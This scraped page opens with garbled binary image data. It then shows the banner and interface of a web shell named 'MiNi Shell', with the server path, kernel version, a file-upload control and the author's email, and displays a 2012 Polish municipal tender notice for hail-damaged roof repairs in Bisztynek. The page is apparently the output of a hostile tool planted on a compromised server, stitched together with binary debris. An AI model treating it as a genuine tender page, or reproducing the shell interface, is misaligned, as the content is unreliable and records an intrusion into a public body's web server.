JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120822/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120822/309442-N-2012.html

<p class="kh_header"><b>Bisztynek: Remont pokryć dachowych w budynkach mieszkalnych i w budynku użytkowym stanowiących 100% własność Gminy Bisztynek uszkodzonych w wyniku nawałnicy z gradobiciem, która wystąpiła w Bisztynku dnia 04.07.2012r.
z podziałem na: 
Zadanie I. Remont pokryć dachowych w 6 budynkach znajdujących się  na ul. Reja, ul. Kajki, ul. Sienkiewicza, ul. Marii Konopnickiej
Zadanie II. Remont pokryć dachowych w 4 budynkach znajdujących się na ul. Kościelnej, ul. Grodzkiej ul. Wojska Polskiego</b><br>
<b>Numer ogłoszenia: 309442 - 2012; data zamieszczenia: 22.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy i Miasta , ul. Kościuszki 2, 11-230 Bisztynek, woj. warmińsko-mazurskie, tel. 089 7188616, faks 089 7188603.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.warmia.mazury.pl/bisztynek_gmina_miejsko_-_wiejska</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pokryć dachowych w budynkach mieszkalnych i w budynku użytkowym stanowiących 100% własność Gminy Bisztynek uszkodzonych w wyniku nawałnicy z gradobiciem, która wystąpiła w Bisztynku dnia 04.07.2012r.
z podziałem na: 
Zadanie I. Remont pokryć dachowych w 6 budynkach znajdujących się  na ul. Reja, ul. Kajki, ul. Sienkiewicza, ul. Marii Konopnickiej
Zadanie II. Remont pokryć dachowych w 4 budynkach znajdujących się na ul. Kościelnej, ul. Grodzkiej ul. Wojska Polskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	 Przedmiotem zamówienia jest remont pokryć dachowych w 9 budynkach mieszkalnych i 1 budynku użytkowym w Bisztynku stanowiących własność Gminy Bisztynek uszkodzonych w wyniku nawałnicy z gradobiciem, która wystąpiła w Bisztynku dnia 04.07.2012r. z podziałem na  2 zadania.

1.1. Zadanie I. Remont pokryć dachowych w 6 budynkach znajdujących się  na ul. Reja, ul. Kajki, ul. Sienkiewicza, ul. Marii Konopnickiej obejmujący: 

1) Remont pokrycia dachu z dachówki ceramicznej budynku mieszkalnego położonego przy ul. Reja 1, obręb 2 m. Bisztynek, działka nr 79
Zakres robót budowlanych obejmuje m.in.:
a) rozebranie gąsiorów - 13,40m oraz pokrycia dachu z dachówki ceramicznej wraz z ołaceniem dachu -202,88m2
b) wymianę deskowania dachu - 121,73m2
c) ołacenie połaci dachowych łatami, pokrycie dachów papą, oraz dachówką holenderką esówką - 202,88 m2
d) obróbkę z blachy ocynkowanej - 29m2
e) założenie rynien dachowych - 29,80 m i rur spustowych - 12,00m
f) przemurowanie kominów z cegieł - 0,25m3 oraz wykonanie tynków na kominach - 8,00m2

2) Remont pokrycia dachu z dachówki ceramicznej budynku mieszkalnego położonego przy ul. Reja 3, obręb 2 m. Bisztynek, działka nr 78/2
Zakres robót budowlanych obejmuje m.in.:
a) rozebranie gąsiorów - 14,60m oraz pokrycia dachu z dachówki ceramicznej wraz z ołaceniem dachu -173,16m2
b) wymianę deskowania dachu - 15,00m2
c) ołacenie połaci dachowych łatami, pokrycie dachów papą, oraz dachówką holenderką esówką - 173,16 m2
d) obróbkę z blachy ocynkowanej - 32,20m2
e) założenie rynien dachowych - 29,20 m i rur spustowych - 28,00m
f) przemurowanie kominów z cegieł - 0,40m3 oraz wykonanie tynków na kominach - 6,00m2

3) Remont pokrycia dachu z dachówki ceramicznej budynku mieszkalnego położonego przy ul. Kajki 11, obręb 2 m. Bisztynek, działka nr 55/4
Zakres robót budowlanych obejmuje m.in.:
a) rozebranie gąsiorów - 8,00m oraz pokrycia dachu z dachówki ceramicznej wraz z ołaceniem dachu -116,96m2
b) wymianę deskowania dachu - 58,48m2
c) ołacenie połaci dachowych łatami, pokrycie dachów papą, oraz dachówką holenderką esówką - 116,96 m2
d) obróbkę z blachy ocynkowanej - 7,50m2
e) założenie rynien dachowych - 16,00 m i rur spustowych - 12,00m
f) przemurowanie kominów z cegieł - 0,40m3 oraz wykonanie tynków na kominach - 12,00m2

4) Remont pokrycia dachu z dachówki ceramicznej budynku mieszkalnego położonego przy ul. Kajki 4, obręb 2 m. Bisztynek, działka nr 38/11
Zakres robót budowlanych obejmuje m.in.:
a) rozebranie pokrycia dachu z papy -163,41m2
b) wymianę deskowania dachu - 163,41m2
c) pokrycie jednowarstwowe dachu papą oraz  pokrycie papą zgrzewalną dachu - 163,41 m2
d) obróbkę z blachy ocynkowanej - 21,00m2
e) założenie rynien dachowych - 19,50 m i rur spustowych - 6,00m
f) przemurowanie kominów z cegieł - 0,60m3 oraz wykonanie tynków na kominach - 12,00m2

5) Remont pokrycia dachu z dachówki ceramicznej budynku użytkowego położonego przy ul. Sienkiewicza 3, obręb 2 m. Bisztynek, działka nr 80
Zakres robót budowlanych obejmuje m.in..:
a) rozebranie rynien - 22,60m oraz rur spustowych - 14,00m z blachy nie nadającej się do użytku
b) rozebranie pokrycia z dachówki - 69,22m2, elementów więźb dachowych: ołacenia - 69,22m2, deskowania - 69,22m, desek okapowych i gzymsowych -22,60m2
c) deskowanie połaci dachowych, folie wstępnego krycia, ołacenie połaci dachowych łatami oraz pokrycie dachu dachówką zakładkową ceramiczną - 69,22m2 wraz z 1 ławą kominiarską 
d) założenie rynien dachowych - 22,60 m i rur spustowych - 14,00m
e) przemurowanie kominów z cegieł - 0,72m3 oraz wykonanie tynków na kominach - 6,00m2

6) Remont pokrycia dachu z dachówki ceramicznej budynku mieszkalnego położonego przy ul. Marii Konopnickiej 13, obręb 1 m. Bisztynek, działka nr 299
Zakres robót budowlanych obejmuje m.in.:
a) rozebranie rynien - 3,70m oraz rur spustowych - 3,00m z blachy nie nadającej się do użytku
b) rozebranie pokrycia z dachówki - 92,88m2, elementów więźb dachowych: ołacenia - 92,88m2, deskowania - 30,00m, desek okapowych i gzymsowych -18,00m2
c) deskowanie połaci dachowych, folie wstępnego krycia, ołacenie połaci dachowych łatami oraz pokrycie dachu dachówką zakładkową ceramiczną - 92,88m2 wraz z 1 ławą kominiarską 
d) założenie rynien dachowych - 21,70 m i rur spustowych - 23,00m
e) przemurowanie kominów z cegieł - 1,34m3 oraz wykonanie tynków na kominach - 5,28m2
f) osadzenie 1 okna w połaci dachowej

1.2. Zadanie II. Remont pokryć dachowych w 4 budynkach znajdujących się na ul. Kościelnej, ul. Grodzkiej i ul. Wojska Polskiego  obejmujący: 

1) Remont pokrycia dachu z dachówki ceramicznej budynku mieszkalnego położonego przy ul. Kościelnej 33, obręb 1 m. Bisztynek, działka nr 32
Zakres robót budowlanych obejmuje m.in.:
a) rozebranie rynien - 26,40m oraz rur spustowych - 11,20m z blachy nie nadającej się do użytku
b) rozebranie: pokrycia z dachówki - 88,56m2, elementów więźb dachowych: ołacenia - 88,56m2, deskowania - 152,52m2, desek okapowych i gzymsowych -46,00m
c) deskowanie połaci dachowych -152,52 m2, folie wstępnego krycia - 88,56 m2, ołacenie połaci dachowych łatami - 88,56 m2 oraz pokrycie dachów dachówką holenderką rozbiórkową - 88,56m2 wraz z 1 ławą kominiarską 
d) założenie rynien dachowych - 26,40 m i rur spustowych - 11,20m
e) osadzenie 1 okna w połaci dachowej
f) uzupełnienie obróbek z blachy stalowej ocynkowanej -5,60 m2
g) przemurowanie kominów z cegieł - 1,44m3 oraz wykonanie tynków na kominach - 8,80m2
h) wymiana elementów konstrukcyjnych dachu - krokwie narożne lub koszowe - 76,26m
i) krycie dachów papą termozgrzewalną - 49,92 m2

2) Remont pokrycia dachu z dachówki ceramicznej budynku mieszkalnego położonego przy ul. Kościelnej 16, obręb 2 m. Bisztynek, działka nr 12
Zakres robót budowlanych obejmuje m.in. :
a) rozebranie rynien - 11,00m z blachy nie nadającej się do użytku
b) rozebranie: pokrycia z dachówki - 107,59m2, elementów więźb dachowych: ołacenia - 107,59m2, deskowania - 53,50m2, desek okapowych i gzymsowych -22,00m
c) deskowanie połaci dachowych -53,50 m2, folie wstępnego krycia - 107,59m2, ołacenie połaci dachowych łatami - 107,59 m2 oraz pokrycie dachów dachówką zakładkowa ceramiczną - 107,59m2 wraz z 1 ławą kominiarską 
d) założenie rynien dachowych - 11m 
e) osadzenie 1 okna w połaci dachowej
f) uzupełnienie obróbek z blachy stalowej ocynkowanej -21,64 m2

3) Remont pokrycia dachu z dachówki ceramicznej budynku położonego przy ul. Grodzkiej 1, obręb 1 m. Bisztynek, działka nr 60
Zakres robót budowlanych obejmuje m.in.:
a) rozebranie rynien - 32,20m oraz rur spustowych - 36,00m z blachy nie nadającej się do użytku
b) rozebranie: pokrycia z dachówki - 212,20m2, elementów więźb dachowych: ołacenia - 212,20m2, deskowania - 106,10m2, desek okapowych i gzymsowych - 32,20m
c) deskowanie połaci dachowych -106,10 m2, folie wstępnego krycia - 212,20 m2, ołacenie połaci dachowych łatami - 212,20 m2 oraz pokrycie dachów dachówką zakładkową ceramiczną - 212,20m2 wraz z 1 ławą kominiarską 
d) założenie rynien dachowych - 32,20 m i rur spustowych - 36m
e) osadzenie 1 okna w połaci dachowej
f) uzupełnienie obróbek z blachy stalowej ocynkowanej -58,02 m2

5) Remont pokrycia dachu z dachówki ceramicznej budynku mieszkalnego położonego przy ul. Wojska Polskiego 13, obręb 1 m. Bisztynek, działka nr 193/1
Zakres robót budowlanych obejmuje m.in.:
a) rozebranie rynien - 32,40m oraz rur spustowych - 12,60m z blachy nie nadającej się do użytku
b) rozebranie: pokrycia z dachówki - 221,94m2, elementów więźb dachowych: ołacenia - 221,94m2, deskowania - 221,94m2, desek okapowych i gzymsowych - 32,40m
c) deskowanie połaci dachowych -221,94m2, folie wstępnego krycia - 221,94 m2, ołacenie połaci dachowych łatami - 221,94 m2 oraz pokrycie dachów dachówką zakładkową ceramiczną - 221,94m2  
d) założenie rynien dachowych - 32,40 m i rur spustowych - 12,60 m
e) osadzenie 1 okna w połaci dachowej
f) uzupełnienie obróbek z blachy stalowej ocynkowanej -2,50 m2
g) przemurowanie kominów z cegieł - 1,20m3 oraz wykonanie tynków na kominach - 6,40m2
h) wzmocnienie krokwi - 36,00m
2.	 Szczegółowy opis przedmiotu zamówienia poszczególnych zadań zawierają przedmiary robót dla poszczególnych budynków. Ilość robót przewidzianych do wykonania została określona w przedmiarach robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9, 45.26.12.11-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości: 
- Całość zamówienia 7 800,00 zł (słownie: siedem tysięcy osiemset złotych),
- Zadanie I zamówienia 4 000,00 zł (słownie: cztery tysiące złotych),
- Zadanie II zamówienia 3 800,00 zł (słownie: trzy tysiące osiemset złotych)
 Gwarancja ubezpieczeniowa, gwarancja bankowa i poręczenie złożone jako zabezpieczenie wadium musi posiadać okres ważności nie krótszy niż okres związania ofertą, pod rygorem wykluczenia Wykonawcy z postępowania.
2.	Wadium może być wnoszone w jednej lub kilku formach określonych w art. 45 ust. 6 ustawy pzp.
3.	Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona z postępowania bez rozpatrywania.
Informacje dodatkowe:
1)	wadium musi być wniesione przed upływem terminu składania ofert. W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę wpływu środków na rachunek bankowy Zamawiającego, wadium w formie pieniężnej należy wnieść  przelewem na konto: Bank Gospodarki Żywnościowej S.A.: 
72 2030 0045 1110 0000 0219 9060</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu dokonywana będzie zgodnie z formułą spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymaganych w siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu dokonywana będzie zgodnie z formułą spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymaganych w siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu dokonywana będzie zgodnie z formułą spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymaganych w siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu dokonywana będzie zgodnie z formułą spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymaganych w siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu dokonywana będzie zgodnie z formułą spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymaganych w siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zaistnienie siły wyższej, tj. zdarzenie, którego strony nie mogły przewidzieć, któremu nie mogły zapobiec ani któremu nie mogą przeciwdziałać, a które uniemożliwia wykonawcy wykonanie w części lub w całości jego zobowiązań. Siła wyższa obejmuje w szczególności zdarzenia:wojna, działania wojenne;klęski żywiołowe, jak powódź, huragan;niepokoje społeczne, w tym okupacje budowy przez osoby inne niż wykonawca i jego podwykonawcy; - inne zdarzenia losowe Rezygnacja z części robót przez Zamawiającego na skutek sytuacji niemożliwej wcześniej do przewidzenia Przekształcenie firmy, zmiana nazwy firmy, zmiana rachunku bankowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.warmia.mazury.pl/bisztynek_gmina_miejsko_-_wiejska<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bisztynku ul. Kościuszki 2 11-230 Bisztynek pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2012 godzina 11:30, miejsce: Urząd Miejski w Bisztynku ul. Kościuszki 2 11-230 Bisztynek pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com